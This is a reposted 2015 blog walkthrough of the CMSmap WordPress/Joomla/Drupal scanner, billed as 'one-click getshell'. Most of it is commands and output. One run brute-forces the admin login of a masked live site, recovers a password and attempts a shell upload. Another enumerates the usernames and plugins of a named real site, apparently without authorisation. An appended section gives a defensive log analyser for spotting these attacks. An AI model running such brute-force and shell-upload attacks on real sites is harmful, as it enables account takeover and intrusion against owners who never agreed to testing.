CMSmap Penetration Testing Tool


Jun 17 2015



I won't say much by way of introduction to CMSmap; in short, it offers one-click getshell against WordPress, Joomla and Drupal.

Download and usage

➜  soft  git clone https://github.com/Dionach/CMSmap.git
➜  CMSmap git:(master) python cmsmap.py
CMSmap tool v0.6 - Simple CMS Scanner
Author: Mike Manzotti mike.manzotti@dionach.com
Usage: cmsmap.py -t <URL>
Targets:
     -t, --target    target URL (e.g. 'https://example.com:8080/')
     -f, --force     force scan (W)ordpress, (J)oomla or (D)rupal
     -F, --fullscan  full scan using large plugin lists. False positives and slow!
     -a, --agent     set custom user-agent
     -T, --threads   number of threads (Default: 5)
     -i, --input     scan multiple targets listed in a given text file
     -o, --output    save output in a file
     --noedb         enumerate plugins without searching exploits

Brute-Force:
     -u, --usr       username or file 
     -p, --psw       password or file
     --noxmlrpc      brute forcing WordPress without XML-RPC

Post Exploitation:
     -k, --crack     password hashes file (Require hashcat installed. For WordPress and Joomla only)
     -w, --wordlist  wordlist file

Others:
     -v, --verbose   verbose mode (Default: false)
     -U, --update    (C)MSmap, (W)ordpress plugins and themes, (J)oomla components, (D)rupal modules, (A)ll
     -h, --help      show this help

Examples:
     cmsmap.py -t https://example.com
     cmsmap.py -t https://example.com -f W -F --noedb
     cmsmap.py -t https://example.com -i targets.txt -o output.txt
     cmsmap.py -t https://example.com -u admin -p passwords.txt
     cmsmap.py -k hashes.txt -w passwords.txt

As the usage text above shows, the tool supports multi-threaded brute forcing.

Trying it out

To protect privacy, I have masked the target.

➜  CMSmap git:(master) ✗ python cmsmap.py -t http://www.****.org/ -u admin -p pass.txt
[-] Date & Time: 15/06/2015 22:36:24
[-] Wordpress Brute Forcing Attack Started
[H] Valid Credentials: admin qwerasdf
[H] Valid credentials: admin qwerasdf . Do you want to try uploading a shell?
[-] (If you are not admin, you won't be able to)
[y/N]: y
[-] Logging in to the target website as admin:qwerasdf
[ERROR] Unable to upload a shell. Probably you are not an admin.
[-] Date & Time: 15/06/2015 22:38:59
[-] Completed in: 0:02:35

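As you can see, in this case the brute force succeeds but getshell does not, because the account does not have administrator privileges.

Fingerprint scan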

➜  CMSmap git:(master) ✗ python cmsmap.py -t http://www.jobbole.com/ -f W
[-] Date & Time: 15/06/2015 22:58:30
[-] Target: http://www.jobbole.com
[M] Website Not in HTTPS: http://www.jobbole.com
[I] Server: nginx
[I] X-Powered-By: PHP/5.3.3
[L] X-Frame-Options: Not Enforced
[I] Strict-Transport-Security: Not Enforced
[I] X-Content-Security-Policy: Not Enforced
[I] X-Content-Type-Options: Not Enforced
[L] Robots.txt Found: http://www.jobbole.com/robots.txt
[I] CMS Detection: Wordpress
[I] Wordpress Theme: jobboleblogv3
[-] Enumerating Wordpress Usernames via "Feed" ...
[-] Enumerating Wordpress Usernames via "Author" ...
[M] 10
[M] 11
[M] 12
[M] 13
[M] 14
[M] 16
[M] 17
[M] 18
[M] 19
[M] 4
[M] 9
[M] Carey
[M] HelloKitty
[M] Spokesman
[M] admin
[M] jobbole
[M] Website vulnerable to XML-RPC Brute Force Vulnerability
[I] Autocomplete Off Not Found: http://www.jobbole.com/wp-login.php
[-] Default WordPress Files:
[I] http://www.jobbole.com/readme.html
[I] http://www.jobbole.com/license.txt
[I] http://www.jobbole.com/xmlrpc.php
[I] http://www.jobbole.com/wp-includes/images/crystal/license.txt
[I] http://www.jobbole.com/wp-includes/images/crystal/license.txt
[I] http://www.jobbole.com/wp-includes/js/plupload/license.txt
[I] http://www.jobbole.com/wp-includes/js/plupload/changelog.txt
[I] http://www.jobbole.com/wp-includes/js/tinymce/license.txt
[I] http://www.jobbole.com/wp-includes/js/tinymce/plugins/spellchecker/changelog.txt
[I] http://www.jobbole.com/wp-includes/js/swfupload/license.txt
[-] Searching Wordpress Plugins ...
[I] jobbole-wp-plugin
[I] mu-widgets
[I] q2w3-fixed-widget
[I] wp-connect
[I] wp-postviews
[I] akismet
[I] bbpress
[I] comment-rating
[I] login-lockdown
[I] ucan-post
[-] Searching Wordpress TimThumbs ... 6%

I feel this simply blows wpscan away; it is very powerful.
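
Seen from the defender's side, the username enumeration, default-file checks and login brute forcing shown in the two runs above leave recognizable request patterns in a web server access log. The following Python example is added here and is not part of CMSmap or the original post; the sample log lines, the thresholds and the finding labels are constructed assumptions.

```python
import re
from collections import Counter, defaultdict

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
AUTHOR_RE = re.compile(r"[?&]author=\d+")          # WordPress author-archive lookup by ID
LOGIN_PATHS = ("/xmlrpc.php", "/wp-login.php")     # the two brute-force entry points
DEFAULT_FILES = ("/readme.html", "/license.txt")   # from the "Default WordPress Files" list

# Constructed sample log in combined log format; IPs come from documentation ranges.
def _line(ip, method, uri, status):
    return f'{ip} - - [01/Jan/2024:10:00:00 +0000] "{method} {uri} HTTP/1.1" {status} 0 "-" "-"'

SAMPLE_LOG = "\n".join(
    [_line("203.0.113.7", "GET", f"/?author={i}", 301) for i in range(1, 5)]
    + [_line("203.0.113.7", "GET", p, 200) for p in DEFAULT_FILES]
    + [_line("203.0.113.7", "POST", "/xmlrpc.php", 200) for _ in range(6)]
    + [_line("198.51.100.9", "POST", "/wp-login.php", 302),
       _line("198.51.100.9", "GET", "/?p=12", 200)]
)

def analyze(log_text, login_threshold=5, author_threshold=3, file_threshold=2):
    """Return {ip: [findings]} for clients whose request counts reach the thresholds."""
    logins = defaultdict(Counter)
    authors, files = Counter(), Counter()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, uri, _status = m.groups()
        path = uri.split("?", 1)[0]
        if method == "POST" and path in LOGIN_PATHS:
            logins[ip][path] += 1
        elif method == "GET" and AUTHOR_RE.search(uri):
            authors[ip] += 1
        elif method == "GET" and path in DEFAULT_FILES:
            files[ip] += 1
    findings = defaultdict(list)
    for ip, per_path in logins.items():
        for path, n in per_path.items():
            if n >= login_threshold:
                findings[ip].append(f"login-bruteforce:{path}:{n}")
    for ip, n in authors.items():
        if n >= author_threshold:
            findings[ip].append(f"author-enum:{n}")
    for ip, n in files.items():
        if n >= file_threshold:
            findings[ip].append(f"default-file-probe:{n}")
    return {ip: sorted(tags) for ip, tags in findings.items()}
```

Counting requests understates XML-RPC guessing when a client batches attempts with system.multicall, so for /xmlrpc.php a low threshold or request-body inspection is the safer choice.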

Source: http://www.codefrom.com/paper/%E7%A7%92%E6%9D%80wpscan%EF%BC%81wordpress%E4%B8%80%E9%94%AEgetshell

Git download

https://github.com/BrianHeeseIs/CMSmap


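Copyright notice: unless otherwise noted, all articles here are original work by ( mOon ); please retain the article source when reposting.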
